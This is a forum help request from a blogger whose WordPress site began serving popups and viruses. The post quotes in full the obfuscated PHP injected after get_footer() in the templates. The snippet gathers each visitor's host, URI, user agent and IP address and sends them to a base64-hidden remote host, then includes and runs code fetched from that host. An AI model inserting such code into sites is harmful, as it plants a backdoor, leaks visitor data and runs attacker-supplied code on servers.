Security Problem
-
I recently had a security problem on my blog(s), http://www.fractured-beauty.net. I’m not exactly sure what happened, but I visited my blog and I was bombarded by a number of popups, advertisements, and even viruses.
I looked around on my blog and I saw that some of my codes had been edited, mainly the sidebar, which had unfamiliar codes on it, and my footer. I fixed the problem, but went back through all of my templates and found this unfamiliar code at the bottom of almost all of my pages.
The code SHOULD be:
<?php get_footer();?>
but was this instead
<?php get_footer(); $z=ini_get('error_reporting');error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);} error_reporting($z);?>
Was this just some hacker out to get me? or was it something i neglected to do security-wise with my wordpress installation?
note: i had NEVER given my password to anyone. nobody knows it but me, and nobody else uses my computer.
- The topic ‘Security Problem’ is closed to new replies.